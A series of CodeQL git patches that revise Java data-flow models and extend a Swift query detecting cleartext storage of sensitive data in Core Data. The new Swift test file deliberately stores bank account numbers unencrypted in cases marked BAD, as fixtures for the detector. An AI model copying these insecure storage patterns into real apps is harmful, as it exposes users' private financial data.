b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll @@ -143,9 +143,10 @@ class TopJdkApi extends SummarizedCallableBase { predicate hasManualMadModel() { this.hasManualSummary() or this.hasManualNeutral() } /* * Note: the following top-100 APIs are not modeled with MaD: - * java.util.stream.Stream#collect(Collector) : handled separately on a case-by-case basis as it is too complex for MaD - * java.lang.String#valueOf(Object) : also a complex case; an alias for `Object.toString`, except the dispatch is hidden - * java.lang.Throwable#printStackTrace() : should probably not be a general step, but there might be specialised queries that care + * `java.util.stream.Stream#collect(Collector)`: handled separately on a case-by-case basis as it is too complex for MaD + * `java.util.stream.Collectors#joining(CharSequence)`: cannot be modeled completely without a model for `java.util.stream.Stream#collect(Collector)` as well + * `java.lang.String#valueOf(Object)`: also a complex case; an alias for `Object.toString`, except the dispatch is hidden + * `java.lang.Throwable#printStackTrace()`: should probably not be a general step, but there might be specialised queries that care */ } diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected index 773d9b2bfae..abe2044906d 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected +++ b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected @@ -1,3 +1,4 @@ | java.lang.String#valueOf(Object) | no manual model | | java.lang.Throwable#printStackTrace() | no manual model | +| java.util.stream.Collectors#joining(CharSequence) | no manual model | | java.util.stream.Stream#collect(Collector) | no manual model | From 99ee6c95a1f4b6af127cb173ab28cffe9d7251ae Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 11 Jan 2023 10:44:38 -0500 Subject: [PATCH 192/381] Java: remove models for Consumer.accept and Collectors.toMap --- java/ql/lib/ext/java.util.function.model.yml | 6 ------ java/ql/lib/ext/java.util.stream.model.yml | 1 - java/ql/test/ext/TopJdkApis/TopJdkApis.qll | 8 +++++--- java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected | 2 ++ 4 files changed, 7 insertions(+), 10 deletions(-) diff --git a/java/ql/lib/ext/java.util.function.model.yml b/java/ql/lib/ext/java.util.function.model.yml index 44c01b611d2..9ee54700752 100644 --- a/java/ql/lib/ext/java.util.function.model.yml +++ b/java/ql/lib/ext/java.util.function.model.yml @@ -11,9 +11,3 @@ extensions: data: - ["java.util.function", "Function", True, "apply", "(Object)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.util.function", "Supplier", False, "get", "()", "", "Argument[-1]", "ReturnValue", "value", "manual"] - - - addsTo: - pack: codeql/java-all - extensible: neutralModel - data: - - ["java.util.function", "Consumer", "accept", "(Object)", "manual"] diff --git a/java/ql/lib/ext/java.util.stream.model.yml b/java/ql/lib/ext/java.util.stream.model.yml index 190cc2709b4..b44c3391075 100644 --- a/java/ql/lib/ext/java.util.stream.model.yml +++ b/java/ql/lib/ext/java.util.stream.model.yml @@ -93,5 +93,4 @@ extensions: extensible: neutralModel data: - ["java.util.stream", "Collectors", "toList", "()", "manual"] - - ["java.util.stream", "Collectors", "toMap", "(Function,Function)", "manual"] - ["java.util.stream", "Collectors", "toSet", "()", "manual"] diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll index 858659634f5..b00cfb4cad7 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll +++ b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll @@ -143,10 +143,12 @@ class TopJdkApi extends SummarizedCallableBase { predicate hasManualMadModel() { this.hasManualSummary() or this.hasManualNeutral() } /* * Note: the following top-100 APIs are not modeled with MaD: - * `java.util.stream.Stream#collect(Collector)`: handled separately on a case-by-case basis as it is too complex for MaD - * `java.util.stream.Collectors#joining(CharSequence)`: cannot be modeled completely without a model for `java.util.stream.Stream#collect(Collector)` as well - * `java.lang.String#valueOf(Object)`: also a complex case; an alias for `Object.toString`, except the dispatch is hidden + * `java.lang.String#valueOf(Object)`: a complex case; an alias for `Object.toString`, except the dispatch is hidden * `java.lang.Throwable#printStackTrace()`: should probably not be a general step, but there might be specialised queries that care + * `java.util.function.Consumer#accept(Object)`: specialized lambda flow + * `java.util.stream.Collectors#joining(CharSequence)`: cannot be modeled completely without a model for `java.util.stream.Stream#collect(Collector)` as well + * `java.util.stream.Collectors#toMap(Function,Function)`: specialized collectors flow + * `java.util.stream.Stream#collect(Collector)`: handled separately on a case-by-case basis as it is too complex for MaD */ } diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected index abe2044906d..2023810b44d 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected +++ b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected @@ -1,4 +1,6 @@ | java.lang.String#valueOf(Object) | no manual model | | java.lang.Throwable#printStackTrace() | no manual model | +| java.util.function.Consumer#accept(Object) | no manual model | | java.util.stream.Collectors#joining(CharSequence) | no manual model | +| java.util.stream.Collectors#toMap(Function,Function) | no manual model | | java.util.stream.Stream#collect(Collector) | no manual model | From 2a99af0e6da80a307875489ab1cc646fdc881e46 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 11 Jan 2023 10:58:46 -0500 Subject: [PATCH 193/381] Java: remove summary model for String.endsWith --- java/ql/lib/ext/java.lang.model.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/java/ql/lib/ext/java.lang.model.yml b/java/ql/lib/ext/java.lang.model.yml index 259c5bcaf06..26e3c50ac9e 100644 --- a/java/ql/lib/ext/java.lang.model.yml +++ b/java/ql/lib/ext/java.lang.model.yml @@ -63,7 +63,6 @@ extensions: - ["java.lang", "String", False, "concat", "(String)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "concat", "(String)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "copyValueOf", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.lang", "String", False, "endsWith", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] # ! why is this a summary model and not a neutral model instead? it returns a boolean - ["java.lang", "String", False, "format", "(Locale,String,Object[])", "", "Argument[1]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "format", "(Locale,String,Object[])", "", "Argument[2].ArrayElement", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "format", "(String,Object[])", "", "Argument[0]", "ReturnValue", "taint", "manual"] @@ -129,7 +128,7 @@ extensions: - ["java.lang", "Object", "hashCode", "()", "manual"] - ["java.lang", "Object", "toString", "()", "manual"] - ["java.lang", "String", "contains", "(CharSequence)", "manual"] - - ["java.lang", "String", "endsWith", "(String)", "manual"] # ! see question on line 65 above + - ["java.lang", "String", "endsWith", "(String)", "manual"] - ["java.lang", "String", "equals", "(Object)", "manual"] - ["java.lang", "String", "equalsIgnoreCase", "(String)", "manual"] - ["java.lang", "String", "hashCode", "()", "manual"] From 0c7ffb055471c116ed26e0e244b3b517aa61d4ce Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 11 Jan 2023 12:04:22 -0500 Subject: [PATCH 194/381] Java: update System.getProperty model --- java/ql/lib/ext/java.lang.model.yml | 5 ++++- java/ql/test/ext/TestModels/Test.java | 3 +++ 2 files changed, 7 insertions(+), 1 deletion(-) diff --git a/java/ql/lib/ext/java.lang.model.yml b/java/ql/lib/ext/java.lang.model.yml index 26e3c50ac9e..ae383705be1 100644 --- a/java/ql/lib/ext/java.lang.model.yml +++ b/java/ql/lib/ext/java.lang.model.yml @@ -103,7 +103,10 @@ extensions: - ["java.lang", "StringBuffer", True, "StringBuffer", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "StringBuilder", True, "StringBuilder", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "System", False, "arraycopy", "", "", "Argument[0]", "Argument[2]", "taint", "manual"] - - ["java.lang", "System", False, "getProperty", "(String)", "", "Argument[-1].MapValue", "ReturnValue", "value", "manual"] + - ["java.lang", "System", False, "getProperty", "(String)", "", "SyntheticGlobal[java.lang.System.properties].MapValue", "ReturnValue", "value", "manual"] + - ["java.lang", "System", False, "setProperty", "(String,String)", "", "SyntheticGlobal[java.lang.System.properties].MapValue", "ReturnValue", "value", "manual"] + - ["java.lang", "System", False, "setProperty", "(String,String)", "", "Argument[0]", "SyntheticGlobal[java.lang.System.properties].MapKey", "value", "manual"] + - ["java.lang", "System", False, "setProperty", "(String,String)", "", "Argument[1]", "SyntheticGlobal[java.lang.System.properties].MapValue", "value", "manual"] - ["java.lang", "Throwable", False, "Throwable", "(Throwable)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "value", "manual"] - ["java.lang", "Throwable", True, "getCause", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "ReturnValue", "value", "manual"] - ["java.lang", "Throwable", True, "getMessage", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "ReturnValue", "value", "manual"] diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index 3afd2c80897..55c531d99bf 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -97,6 +97,9 @@ public class Test { long l3 = (long)source(); sink(String.valueOf(l3)); // $hasTaintFlow + System.setProperty("testKey", (String)source()); + sink(System.getProperty("testKey")); // $hasValueFlow + // java.math long l4 = (long)source(); sink(BigDecimal.valueOf(l4)); // $hasTaintFlow From 82f9903bf0aaeec07b09af2029ad620387b55cc6 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Mon, 9 Jan 2023 14:37:24 +0000 Subject: [PATCH 195/381] Swift: Additional test cases for swift/cleartext-storage-database on Core Data. --- .../Security/CWE-311/SensitiveExprs.expected | 28 ++++++++ .../Security/CWE-311/testCoreData2.swift | 67 +++++++++++++++++++ 2 files changed, 95 insertions(+) create mode 100644 swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift diff --git a/swift/ql/test/query-tests/Security/CWE-311/SensitiveExprs.expected b/swift/ql/test/query-tests/Security/CWE-311/SensitiveExprs.expected index 3c61ec86e95..89f9b9ac32a 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/SensitiveExprs.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/SensitiveExprs.expected @@ -8,6 +8,34 @@ | testAlamofire.swift:195:64:195:64 | password | label:password, type:credential | | testAlamofire.swift:205:62:205:62 | password | label:password, type:credential | | testAlamofire.swift:213:65:213:65 | password | label:password, type:credential | +| testCoreData2.swift:37:16:37:16 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:38:2:38:6 | .myBankAccountNumber | label:myBankAccountNumber, type:private information | +| testCoreData2.swift:39:2:39:6 | .myBankAccountNumber | label:myBankAccountNumber, type:private information | +| testCoreData2.swift:39:28:39:28 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:40:2:40:6 | .myBankAccountNumber2 | label:myBankAccountNumber2, type:private information | +| testCoreData2.swift:41:2:41:6 | .myBankAccountNumber2 | label:myBankAccountNumber2, type:private information | +| testCoreData2.swift:41:29:41:29 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:42:2:42:6 | .notStoredBankAccountNumber | label:notStoredBankAccountNumber, type:private information | +| testCoreData2.swift:43:2:43:6 | .notStoredBankAccountNumber | label:notStoredBankAccountNumber, type:private information | +| testCoreData2.swift:43:35:43:35 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:46:22:46:22 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:47:2:47:12 | .myBankAccountNumber | label:myBankAccountNumber, type:private information | +| testCoreData2.swift:48:2:48:12 | .myBankAccountNumber | label:myBankAccountNumber, type:private information | +| testCoreData2.swift:48:34:48:34 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:49:2:49:12 | .myBankAccountNumber2 | label:myBankAccountNumber2, type:private information | +| testCoreData2.swift:50:2:50:12 | .myBankAccountNumber2 | label:myBankAccountNumber2, type:private information | +| testCoreData2.swift:50:35:50:35 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:51:2:51:12 | .notStoredBankAccountNumber | label:notStoredBankAccountNumber, type:private information | +| testCoreData2.swift:52:2:52:12 | .notStoredBankAccountNumber | label:notStoredBankAccountNumber, type:private information | +| testCoreData2.swift:52:41:52:41 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:57:3:57:7 | .myBankAccountNumber | label:myBankAccountNumber, type:private information | +| testCoreData2.swift:57:29:57:29 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:60:4:60:8 | .myBankAccountNumber | label:myBankAccountNumber, type:private information | +| testCoreData2.swift:60:30:60:30 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:62:4:62:8 | .myBankAccountNumber | label:myBankAccountNumber, type:private information | +| testCoreData2.swift:62:30:62:30 | bankAccountNo | label:bankAccountNo, type:private information | +| testCoreData2.swift:65:3:65:7 | .myBankAccountNumber | label:myBankAccountNumber, type:private information | +| testCoreData2.swift:65:29:65:29 | bankAccountNo | label:bankAccountNo, type:private information | | testCoreData.swift:48:15:48:15 | password | label:password, type:credential | | testCoreData.swift:51:24:51:24 | password | label:password, type:credential | | testCoreData.swift:58:15:58:15 | password | label:password, type:credential | diff --git a/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift b/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift new file mode 100644 index 00000000000..3a79e82b7eb --- /dev/null +++ b/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift @@ -0,0 +1,67 @@ + +// --- stubs --- + +class NSObject +{ +} + +@propertyWrapper +struct NSManaged { // note: this may not be an accurate stub for `NSManaged`. + var wrappedValue: Any { + didSet {} + } +} + +class NSManagedObject : NSObject +{ +} + +class MyManagedObject2 : NSManagedObject +{ + @NSManaged public var myValue: Int + @NSManaged public var myBankAccountNumber : Int + public var notStoredBankAccountNumber: Int = 0 +} + +extension MyManagedObject2 +{ + @NSManaged public var myBankAccountNumber2 : Int +} + +// --- tests --- + +func testCoreData2_1(obj: MyManagedObject2, maybeObj: MyManagedObject2?, value: Int, bankAccountNo: Int) +{ + // @NSManaged fields of an NSManagedObject... + obj.myValue = value // GOOD (not sensitive) + obj.myValue = bankAccountNo // BAD [NOT DETECTED] + obj.myBankAccountNumber = value // BAD [NOT DETECTED] + obj.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] + obj.myBankAccountNumber2 = value // BAD [NOT DETECTED] + obj.myBankAccountNumber2 = bankAccountNo // BAD [NOT DETECTED] + obj.notStoredBankAccountNumber = value // GOOD (not stored in the database) + obj.notStoredBankAccountNumber = bankAccountNo // GOOD (not stored in the datbase) + + maybeObj?.myValue = value // GOOD (not sensitive) + maybeObj?.myValue = bankAccountNo // BAD [NOT DETECTED] + maybeObj?.myBankAccountNumber = value // BAD [NOT DETECTED] + maybeObj?.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] + maybeObj?.myBankAccountNumber2 = value // BAD [NOT DETECTED] + maybeObj?.myBankAccountNumber2 = bankAccountNo // BAD [NOT DETECTED] + maybeObj?.notStoredBankAccountNumber = value // GOOD (not stored in the database) + maybeObj?.notStoredBankAccountNumber = bankAccountNo // GOOD (not stored in the datbase) +} + +class testCoreData2_2 { + func myFunc(obj: MyManagedObject2, bankAccountNo: Int) { + obj.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] + + if #available(iOS 10.0, *) { + obj.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] + } else { + obj.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] + } + + obj.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] + } +} From 2622de97471382763ad8af384fe9893ed3b6212f Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 10 Jan 2023 13:45:54 +0000 Subject: [PATCH 196/381] Swift: Improve Core Data coverage. --- .../CWE-311/CleartextStorageDatabase.ql | 18 ++++-- .../CWE-311/CleartextStorageDatabase.expected | 56 +++++++++++++++++++ .../Security/CWE-311/testCoreData.swift | 4 +- .../Security/CWE-311/testCoreData2.swift | 14 ++--- 4 files changed, 79 insertions(+), 13 deletions(-) diff --git a/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql b/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql index e858e6dd357..b34f1b0c6cf 100644 --- a/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql +++ b/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql @@ -27,13 +27,23 @@ abstract class Stored extends DataFlow::Node { } */ class CoreDataStore extends Stored { CoreDataStore() { - // values written into Core Data objects are a sink + // values written into Core Data objects through `set*Value` methods are a sink. exists(CallExpr call | call.getStaticTarget() .(MethodDecl) .hasQualifiedName("NSManagedObject", ["setValue(_:forKey:)", "setPrimitiveValue(_:forKey:)"]) and call.getArgument(0).getExpr() = this.asExpr() + ) or + // any write into a class derived from `NSManagedObject` is a sink. For + // example in `coreDataObj.data = sensitive` the post-update node corresponding + // with `coreDataObj.data` is a sink. + // (ideally this would be only members with the `@NSManaged` attribute) + exists(ClassOrStructDecl cd, Expr e | + cd.getABaseTypeDecl*().getName() = "NSManagedObject" and + this.(DataFlow::PostUpdateNode).getPreUpdateNode().asExpr() = e and + e.getFullyConverted().getType() = cd.getType() and + not e.(DeclRefExpr).getDecl() instanceof SelfParamDecl ) } } @@ -78,12 +88,12 @@ class CleartextStorageConfig extends TaintTracking::Configuration { } override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) { - // flow out from fields of a `RealmSwiftObject` at the sink, for example in - // `realmObj.data = sensitive`. + // flow out from fields of an `NSManagedObject` or `RealmSwiftObject` at the sink, + // for example in `realmObj.data = sensitive`. isSink(node) and exists(ClassOrStructDecl cd | c.getAReadContent().(DataFlow::Content::FieldContent).getField() = cd.getAMember() and - cd.getABaseTypeDecl*().getName() = "RealmSwiftObject" + cd.getABaseTypeDecl*().getName() = ["NSManagedObject", "RealmSwiftObject"] ) or // any default implicit reads diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected index fa0af25eec9..d5b33a22ba1 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected @@ -1,9 +1,29 @@ edges | file://:0:0:0:0 | value : | file://:0:0:0:0 | [post] self [data] : | +| file://:0:0:0:0 | value : | file://:0:0:0:0 | [post] self [notStoredBankAccountNumber] : | +| testCoreData2.swift:23:13:23:13 | value : | file://:0:0:0:0 | value : | +| testCoreData2.swift:37:2:37:2 | [post] obj [myValue] : | testCoreData2.swift:37:2:37:2 | [post] obj | +| testCoreData2.swift:37:16:37:16 | bankAccountNo : | testCoreData2.swift:37:2:37:2 | [post] obj [myValue] : | +| testCoreData2.swift:39:2:39:2 | [post] obj [myBankAccountNumber] : | testCoreData2.swift:39:2:39:2 | [post] obj | +| testCoreData2.swift:39:28:39:28 | bankAccountNo : | testCoreData2.swift:39:2:39:2 | [post] obj [myBankAccountNumber] : | +| testCoreData2.swift:43:2:43:2 | [post] obj [notStoredBankAccountNumber] : | testCoreData2.swift:43:2:43:2 | [post] obj | +| testCoreData2.swift:43:35:43:35 | bankAccountNo : | testCoreData2.swift:23:13:23:13 | value : | +| testCoreData2.swift:43:35:43:35 | bankAccountNo : | testCoreData2.swift:43:2:43:2 | [post] obj [notStoredBankAccountNumber] : | +| testCoreData2.swift:46:2:46:10 | [post] ...? [myValue] : | testCoreData2.swift:46:2:46:10 | [post] ...? | +| testCoreData2.swift:46:22:46:22 | bankAccountNo : | testCoreData2.swift:46:2:46:10 | [post] ...? [myValue] : | +| testCoreData2.swift:48:2:48:10 | [post] ...? [myBankAccountNumber] : | testCoreData2.swift:48:2:48:10 | [post] ...? | +| testCoreData2.swift:48:34:48:34 | bankAccountNo : | testCoreData2.swift:48:2:48:10 | [post] ...? [myBankAccountNumber] : | +| testCoreData2.swift:52:2:52:10 | [post] ...? [notStoredBankAccountNumber] : | testCoreData2.swift:52:2:52:10 | [post] ...? | +| testCoreData2.swift:52:41:52:41 | bankAccountNo : | testCoreData2.swift:23:13:23:13 | value : | +| testCoreData2.swift:52:41:52:41 | bankAccountNo : | testCoreData2.swift:52:2:52:10 | [post] ...? [notStoredBankAccountNumber] : | +| testCoreData2.swift:57:3:57:3 | [post] obj [myBankAccountNumber] : | testCoreData2.swift:57:3:57:3 | [post] obj | +| testCoreData2.swift:57:29:57:29 | bankAccountNo : | testCoreData2.swift:57:3:57:3 | [post] obj [myBankAccountNumber] : | | testCoreData.swift:18:19:18:26 | value : | testCoreData.swift:19:12:19:12 | value | | testCoreData.swift:31:3:31:3 | newValue : | testCoreData.swift:32:13:32:13 | newValue | | testCoreData.swift:61:25:61:25 | password : | testCoreData.swift:18:19:18:26 | value : | +| testCoreData.swift:64:2:64:2 | [post] obj [myValue] : | testCoreData.swift:64:2:64:2 | [post] obj | | testCoreData.swift:64:16:64:16 | password : | testCoreData.swift:31:3:31:3 | newValue : | +| testCoreData.swift:64:16:64:16 | password : | testCoreData.swift:64:2:64:2 | [post] obj [myValue] : | | testCoreData.swift:77:24:77:24 | x : | testCoreData.swift:78:15:78:15 | x | | testCoreData.swift:80:10:80:22 | call to getPassword() : | testCoreData.swift:81:15:81:15 | y | | testCoreData.swift:91:10:91:10 | passwd : | testCoreData.swift:95:15:95:15 | x | @@ -24,7 +44,31 @@ edges | testRealm.swift:59:11:59:11 | myPassword : | testRealm.swift:59:2:59:2 | [post] g [data] : | nodes | file://:0:0:0:0 | [post] self [data] : | semmle.label | [post] self [data] : | +| file://:0:0:0:0 | [post] self [notStoredBankAccountNumber] : | semmle.label | [post] self [notStoredBankAccountNumber] : | | file://:0:0:0:0 | value : | semmle.label | value : | +| file://:0:0:0:0 | value : | semmle.label | value : | +| testCoreData2.swift:23:13:23:13 | value : | semmle.label | value : | +| testCoreData2.swift:37:2:37:2 | [post] obj | semmle.label | [post] obj | +| testCoreData2.swift:37:2:37:2 | [post] obj [myValue] : | semmle.label | [post] obj [myValue] : | +| testCoreData2.swift:37:16:37:16 | bankAccountNo : | semmle.label | bankAccountNo : | +| testCoreData2.swift:39:2:39:2 | [post] obj | semmle.label | [post] obj | +| testCoreData2.swift:39:2:39:2 | [post] obj [myBankAccountNumber] : | semmle.label | [post] obj [myBankAccountNumber] : | +| testCoreData2.swift:39:28:39:28 | bankAccountNo : | semmle.label | bankAccountNo : | +| testCoreData2.swift:43:2:43:2 | [post] obj | semmle.label | [post] obj | +| testCoreData2.swift:43:2:43:2 | [post] obj [notStoredBankAccountNumber] : | semmle.label | [post] obj [notStoredBankAccountNumber] : | +| testCoreData2.swift:43:35:43:35 | bankAccountNo : | semmle.label | bankAccountNo : | +| testCoreData2.swift:46:2:46:10 | [post] ...? | semmle.label | [post] ...? | +| testCoreData2.swift:46:2:46:10 | [post] ...? [myValue] : | semmle.label | [post] ...? [myValue] : | +| testCoreData2.swift:46:22:46:22 | bankAccountNo : | semmle.label | bankAccountNo : | +| testCoreData2.swift:48:2:48:10 | [post] ...? | semmle.label | [post] ...? | +| testCoreData2.swift:48:2:48:10 | [post] ...? [myBankAccountNumber] : | semmle.label | [post] ...? [myBankAccountNumber] : | +| testCoreData2.swift:48:34:48:34 | bankAccountNo : | semmle.label | bankAccountNo : | +| testCoreData2.swift:52:2:52:10 | [post] ...? | semmle.label | [post] ...? | +| testCoreData2.swift:52:2:52:10 | [post] ...? [notStoredBankAccountNumber] : | semmle.label | [post] ...? [notStoredBankAccountNumber] : | +| testCoreData2.swift:52:41:52:41 | bankAccountNo : | semmle.label | bankAccountNo : | +| testCoreData2.swift:57:3:57:3 | [post] obj | semmle.label | [post] obj | +| testCoreData2.swift:57:3:57:3 | [post] obj [myBankAccountNumber] : | semmle.label | [post] obj [myBankAccountNumber] : | +| testCoreData2.swift:57:29:57:29 | bankAccountNo : | semmle.label | bankAccountNo : | | testCoreData.swift:18:19:18:26 | value : | semmle.label | value : | | testCoreData.swift:19:12:19:12 | value | semmle.label | value | | testCoreData.swift:31:3:31:3 | newValue : | semmle.label | newValue : | @@ -33,6 +77,8 @@ nodes | testCoreData.swift:51:24:51:24 | password | semmle.label | password | | testCoreData.swift:58:15:58:15 | password | semmle.label | password | | testCoreData.swift:61:25:61:25 | password : | semmle.label | password : | +| testCoreData.swift:64:2:64:2 | [post] obj | semmle.label | [post] obj | +| testCoreData.swift:64:2:64:2 | [post] obj [myValue] : | semmle.label | [post] obj [myValue] : | | testCoreData.swift:64:16:64:16 | password : | semmle.label | password : | | testCoreData.swift:77:24:77:24 | x : | semmle.label | x : | | testCoreData.swift:78:15:78:15 | x | semmle.label | x | @@ -59,16 +105,26 @@ nodes | testRealm.swift:59:2:59:2 | [post] g [data] : | semmle.label | [post] g [data] : | | testRealm.swift:59:11:59:11 | myPassword : | semmle.label | myPassword : | subpaths +| testCoreData2.swift:43:35:43:35 | bankAccountNo : | testCoreData2.swift:23:13:23:13 | value : | file://:0:0:0:0 | [post] self [notStoredBankAccountNumber] : | testCoreData2.swift:43:2:43:2 | [post] obj [notStoredBankAccountNumber] : | +| testCoreData2.swift:52:41:52:41 | bankAccountNo : | testCoreData2.swift:23:13:23:13 | value : | file://:0:0:0:0 | [post] self [notStoredBankAccountNumber] : | testCoreData2.swift:52:2:52:10 | [post] ...? [notStoredBankAccountNumber] : | | testRealm.swift:34:11:34:11 | myPassword : | testRealm.swift:16:6:16:6 | value : | file://:0:0:0:0 | [post] self [data] : | testRealm.swift:34:2:34:2 | [post] a [data] : | | testRealm.swift:42:11:42:11 | myPassword : | testRealm.swift:16:6:16:6 | value : | file://:0:0:0:0 | [post] self [data] : | testRealm.swift:42:2:42:2 | [post] c [data] : | | testRealm.swift:52:12:52:12 | myPassword : | testRealm.swift:16:6:16:6 | value : | file://:0:0:0:0 | [post] self [data] : | testRealm.swift:52:2:52:3 | [post] ...! [data] : | | testRealm.swift:59:11:59:11 | myPassword : | testRealm.swift:16:6:16:6 | value : | file://:0:0:0:0 | [post] self [data] : | testRealm.swift:59:2:59:2 | [post] g [data] : | #select +| testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo : | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:37:16:37:16 | bankAccountNo : | bankAccountNo | +| testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo : | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo : | bankAccountNo | +| testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo : | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo : | bankAccountNo | +| testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo : | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '[post] ...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo : | bankAccountNo | +| testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo : | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '[post] ...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo : | bankAccountNo | +| testCoreData2.swift:52:2:52:10 | ...? | testCoreData2.swift:52:41:52:41 | bankAccountNo : | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '[post] ...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo : | bankAccountNo | +| testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo : | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo : | bankAccountNo | | testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password : | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password : | password | | testCoreData.swift:32:13:32:13 | newValue | testCoreData.swift:64:16:64:16 | password : | testCoreData.swift:32:13:32:13 | newValue | This operation stores 'newValue' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password : | password | | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:48:15:48:15 | password | password | | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:51:24:51:24 | password | password | | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | This operation stores 'password' in a database. It may contain 